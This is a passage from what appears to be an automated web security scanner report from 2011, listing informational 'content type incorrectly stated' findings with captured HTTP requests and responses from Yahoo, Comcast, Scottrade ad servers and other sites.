HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:46:07 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-control: max-age=3600, private
Last-Modified: Fri, 30 Apr 2010 13:03:51 GMT
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 90

OK
<!-- nmusic134.music.mud.yahoo.com compressed/chunked Tue Sep 6 05:46:07 PDT 2011 -->

25.33. http://new.music.yahoo.com/ymusicStayConnected/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://new.music.yahoo.com
Path:   /ymusicStayConnected/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /ymusicStayConnected/ HTTP/1.1
Host: new.music.yahoo.com
Proxy-Connection: keep-alive
Referer: http://new.music.yahoo.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; YMT=d=dj0xJnQ9MCZ0cz0xMzE1MjUxODE1&s=RKnJfnz7ookDnnWANSk9kA--; YMP_VOLUME=0.5; mlap_us=%7B%22d%22%3A%5B%5B%22yahooVideosContainer%22%2C%22ySearch%22%2C%22yMusicImages%22%2C%22yahooAlbums%22%2C%22yNews%22%2C%22Youtube%22%5D%2C%5B%22yahooTracksPopular%22%2C%22yConcerts%22%2C%22lastfm%22%2C%22pandora%22%2C%22flickr%22%2C%22iTunes%22%2C%22Amazon%22%5D%5D%2C%22m%22%3A%22%22%2C%22i%22%3A%22us%22%2C%22v%22%3A%221.1%22%2C%22c%22%3A0%7D; adxid=016e3b4e6615bdb5; BA=t=1315331123; adxf=3078081@1@223.1071929@1@223

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:39 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: private
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 926

<div id="ymusic-stayconnected-hp">
   <h2>Stay Connected to Your Music</h2>
   <ul>
               <li>
           <a id="ymusic-stayconnected1" href="http://new.music.yahoo.com/apps/facebook/" class="ymusic-link-facebook">
...[SNIP]...

25.34. http://pixel.fetchback.com/serve/fb/pdc  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /serve/fb/pdc?cat=&name=landing&sid=3018 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.ooma.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: act=1_1315103291; opt=1

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:05 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1315309925; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: uid=1_1315309925_1315309925595:3279793012126635; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: kwd=1_1315309925; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: sit=1_1315309925; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cre=1_1315309925; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bpd=1_1315309925; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: apd=1_1315309925; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: scg=1_1315309925; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ppd=1_1315309925; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: afl=1_1315309925; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: act=1_1315309925; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 06 Sep 2011 11:52:05 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40

<!-- opt out exists or ip filtered -->

25.35. http://realestate.yahoo.com/autocomplete/cities.html  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://realestate.yahoo.com
Path:   /autocomplete/cities.html

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /autocomplete/cities.html?query=100 HTTP/1.1
Host: realestate.yahoo.com
Proxy-Connection: keep-alive
Referer: http://realestate.yahoo.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:46 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 79

<!-- fe6.rel.sp2.yahoo.com compressed/chunked Tue Sep 6 05:49:46 PDT 2011 -->

25.36. http://realestate.yahoo.com/robots.txt  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://realestate.yahoo.com
Path:   /robots.txt

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /robots.txt HTTP/1.1
Host: realestate.yahoo.com
Proxy-Connection: keep-alive
Referer: http://realestate.yahoo.com/search/New_York/New_York/homes-for-sale?typeBak=realestate&p=10010&type=classified&priceLow=&priceHigh=&bedroomLow=&bathroomLow=&search=Search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:50 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Fri, 17 Jun 2011 07:06:48 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 121

User-agent: Googlebot
Disallow: /xml/

User-agent: *
Disallow: /xml/

Sitemap: http://realestate.yahoo.com/sitemap.xml

25.37. http://sales.liveperson.net/hcp/html/mTag.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /hcp/html/mTag.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /hcp/html/mTag.js?site=21807557 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.scottrade.com/online-trading.html?cid=AM|46|1542|1206|131&rid=L|1736690&amvid=OPT_OUT&symbol=SPY
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315262431881; ASPSESSIONIDQCCCSCCQ=AJBDBJDAOIIOIDAHABHJGONH

Response

HTTP/1.1 200 OK
Content-Length: 17291
Content-Type: application/x-javascript
Content-Location: http://sales.liveperson.net/lpWeb/default_ENT//hcpv/emt/mtag.js?site=21807557
Last-Modified: Sun, 13 Mar 2011 22:27:52 GMT
Accept-Ranges: bytes
ETag: "e0f243e4cde1cb1:28bd"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:48:54 GMT

eval((function(s){var a,c,e,i,j,o="",r,t=".....................................................................................................................$@^`~";for(i=0;i<s.length;i++){r=t+s[i][
...[SNIP]...

25.38. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/1315313323**  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://scottrade.wsod.com
Path:   /embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/1315313323**

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/1315313323**;10,3,183;1920;1200;http%3A_@2F_@2Fwww.scottrade.com_@2Fonline-trading.html_@3Fcid%3DAM%7C46%7C1542%7C1206%7C131_@26rid%3DL%7C1736690_@26amvid%3DOPT_OUT_@26symbol%3DSPY HTTP/1.1
Host: scottrade.wsod.com
Proxy-Connection: keep-alive
Referer: http://www.scottrade.com/online-trading.html?cid=AM|46|1542|1206|131&rid=L|1736690&amvid=OPT_OUT&symbol=SPY
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ub=OPT_OUT

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 12:48:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_8=10:37:190:18:0:50961:1315313325:B2|10:37:191:18:0:50961:1315313324:B2; expires=Fri, 07-Oct-2011 12:48:45 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 841

   function cmsOOB37190() {
       var ioob = new Image();
       ioob.onload = function() {}
       var rand = Math.random() + "";
           rand = rand * 10000;
       ioob.src = '//scottrade.wsod.com/click/5f7eefdbd0f4af885fc2
...[SNIP]...

25.39. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/1315313352**  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://scottrade.wsod.com
Path:   /embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/1315313352**

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/1315313352**;10,3,183;1920;1200;http%3A_@2F_@2Fwww.scottrade.com_@2Fonline-trading_@2Ffund-your-account.html HTTP/1.1
Host: scottrade.wsod.com
Proxy-Connection: keep-alive
Referer: http://www.scottrade.com/online-trading/fund-your-account.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ub=OPT_OUT; u=4e6616acaf0c5; f8=258981:et:8:ETF:07:4:; i_8=10:37:191:18:0:50961:1315313324:B2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 12:49:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_8=10:37:190:18:0:50961:1315313355:B2|10:37:190:18:0:50961:1315313354:B2|10:37:191:18:0:50961:1315313324:B2; expires=Fri, 07-Oct-2011 12:49:15 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 787

   function cmsOOB37190() {
       var ioob = new Image();
       ioob.onload = function() {}
       var rand = Math.random() + "";
           rand = rand * 10000;
       ioob.src = '//scottrade.wsod.com/click/5f7eefdbd0f4af885fc2
...[SNIP]...

25.40. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/59689.70851972699  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://scottrade.wsod.com
Path:   /embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/59689.70851972699

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/59689.70851972699 HTTP/1.1
Host: scottrade.wsod.com
Proxy-Connection: keep-alive
Referer: http://www.scottrade.com/online-trading/fund-your-account.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ub=OPT_OUT; u=4e6616acaf0c5; f8=258981:et:8:ETF:07:4:; i_8=10:37:191:18:0:50961:1315313324:B2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 12:49:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1506

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...

25.41. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/78868.26389003545  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://scottrade.wsod.com
Path:   /embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/78868.26389003545

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/78868.26389003545 HTTP/1.1
Host: scottrade.wsod.com
Proxy-Connection: keep-alive
Referer: http://www.scottrade.com/online-trading.html?cid=AM|46|1542|1206|131&rid=L|1736690&amvid=OPT_OUT&symbol=SPY
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ub=OPT_OUT

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 12:48:43 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1506

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...

25.42. http://sensor2.suitesmart.com/sensor4.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://sensor2.suitesmart.com
Path:   /sensor4.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /sensor4.js?GID=15493;CRE=;PLA=;ADI=; HTTP/1.1
Host: sensor2.suitesmart.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: G15740=C1S104345-1-0-0-0-1314814746-0; spass=a1bfb027540676fe37eda0dd3047b05c

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:50 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: G15493=C1S99917-2-0-0-0-1315313090-0; path=/; domain=.suitesmart.com; expires=Sun, 04-Mar-2012 12:44:50 GMT
Pragma: no-cache
Cache-control: no-cache
P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" , policyref="http://www.suitesmart.com/privacy/p3p/policy.p3p"
Connection: close
Content-Type: text/html
Expires: Tue, 06 Sep 2011 12:44:50 GMT
Content-Length: 376

<!--
var serviceFlag = typeof(serviceFlag) == "undefined" ? false:serviceFlag;
var swCtrl = false;
var snote = 'Sorry SAM';
if (typeof(RunService) == "undefined"){
RunService = new Function();
S
...[SNIP]...

25.43. http://sitesearch.comcast.com/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://sitesearch.comcast.com
Path:   /

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain JSON.

Request

GET /?cat=qc&q=i HTTP/1.1
Host: sitesearch.comcast.com
Proxy-Connection: keep-alive
Referer: http://sitesearch.comcast.com/?q=xss&cat=com&con=www&sec=&PageName=Looking%2Bfor+Products+and+Prices%3F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445; UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; fsr.s={"v":1,"pv":1,"lc":{"d0":{"v":1,"s":true,"e":1}},"sd":0}; mbox=session#1315327839174-766376#1315331594|check#true#1315329794|PC#1315327839174-766376.19#1316539335; s_pers=%20s_dfa%3Dcomcastdotcomprod%7C1315331533264%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%255D%7C1473182534676%3B%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20gpv_07%3Dsearch%2520results%2520-%2520page%25201%7C1315331534692%3B; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20s_cc%3Dtrue%3B%20ev41%3Dxss%3B%20stc18%3Dxss%3B%20SC_LINKS%3D%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_sq%3D%3B; bn_u=6923713561343025788

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:22:20 GMT
Server: Apache/2.0.52 (Red Hat)
Vary: Accept-Encoding
Content-Length: 336
Connection: close
Content-Type: text/html; charset=UTF-8

["i","","international long distance rates","","internet connection settings","","international calling rates","","international long distance","","internet and phone bundles","","internet parental co
...[SNIP]...

25.44. http://sitesearch.comcast.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://sitesearch.comcast.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: sitesearch.comcast.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445; UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; fsr.s={"v":1,"pv":1,"lc":{"d0":{"v":1,"s":true,"e":1}},"sd":0}; mbox=session#1315327839174-766376#1315331594|check#true#1315329794|PC#1315327839174-766376.19#1316539335; s_pers=%20s_dfa%3Dcomcastdotcomprod%7C1315331533264%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%255D%7C1473182534676%3B%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20gpv_07%3Dsearch%2520results%2520-%2520page%25201%7C1315331534692%3B; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20s_cc%3Dtrue%3B%20ev41%3Dxss%3B%20stc18%3Dxss%3B%20SC_LINKS%3D%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_sq%3D%3B; bn_u=6923713561343025788

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:22:16 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Fri, 19 Sep 2008 12:18:22 GMT
ETag: "2a294c1-2796-b28cbf80"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 10134
Connection: close
Content-Type: text/plain; charset=UTF-8

..............(...f... ......................h...v... ...........    ........ .h....... .... .........(....... ...................................HKI.........#...WQ............z.....qk..........62....
...[SNIP]...

25.45. http://verify.authorize.net/anetseal/images/secure90x72.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://verify.authorize.net
Path:   /anetseal/images/secure90x72.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /anetseal/images/secure90x72.gif HTTP/1.1
Host: verify.authorize.net
Proxy-Connection: keep-alive
Referer: http://www.aptela.com/misc/privacy-policy/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 2894
Content-Type: image/gif
Last-Modified: Fri, 26 Mar 2010 17:33:22 GMT
Accept-Ranges: bytes
ETag: "0dd746eacdca1:1241"
Server: Microsoft-IIS/6.0
P3P: CP="NOI NID NAV"
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:26:25 GMT

.PNG
.
...IHDR...Z...H.....v.......tEXtSoftware.Adobe ImageReadyq.e<..
.IDATx...?.+G...G.G...pK...ED.S..#DG..P..FQ:#.D.8....'BH....H.n...".E.....    ..?.....w..]..{o.H#..g..3.<...;s...{O...S...zh...|g.
...[SNIP]...

25.46. http://www.aptela.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.aptela.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.aptela.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=207344579.; __utmxx=207344579.; __utma=207344579.967367889.1315327921.1315327921.1315327921.1; __utmb=207344579.1.10.1315327921; __utmc=207344579; __utmz=207344579.1315327921.1.1.utmcsr=google|utmgclid=CMqnsqPHiKsCFRM2gwodbCP53A|utmccn=phones_business|utmcmd=ppc|utmctr=business_telephone_service; _mkto_trk=id:533-RGZ-601&token:_mch-aptela.com-1315327921949-36615; tsa1v784=uvid54f3722f72cf13ba4e964afc25de508921958; tsa1s784=usid54f3722f72cf13ba4e964afc25de508921958; WRUID=1480628145.1067928662

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:04 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Wed, 31 Dec 2008 16:47:09 GMT
ETag: "1c6c002-37e-7572dd40"
Accept-Ranges: bytes
Content-Length: 894
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ...............................&:;%9:&;9(:9":8(:9&:;$9:&;9$9:(:;%:;%:8&:;%:7%:;&;<6u;..>..8..7..7.x&;<$:8-YR8.s4.p7.o5.t5xi%:;'DA>..A..C..C..E..>...OK)?=4uf9..>..:..7..
...[SNIP]...

25.47. http://www.comcast.com/MediaLibrary/1/1/Common/Images/borders/230_Middle.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.comcast.com
Path:   /MediaLibrary/1/1/Common/Images/borders/230_Middle.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /MediaLibrary/1/1/Common/Images/borders/230_Middle.gif HTTP/1.1
Host: www.comcast.com
Proxy-Connection: keep-alive
Referer: http://www.comcast.com/Corporate/Customers/contactus/ContactUs.html?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_comcastcom_VIP1=3882506052.20480.0000; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445; UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; BIGipServerpool_comcastcom-VIP2=137228613.20480.0000; UserID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; fsr.s={"v":1,"pv":1,"lc":{"d0":{"v":1,"s":true,"e":1}},"sd":0,"cp":{"CustomerID":"86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9"}}; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20s_dfa%3Dcomcastdotcomprod%7C1315331665408%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%252C%255B'internet%252520phone'%252C'1315329866001'%255D%255D%7C1473182666001%3B%20gpv_07%3Dsearch%2520results%2520-%2520page%25201%7C1315331666014%3B; 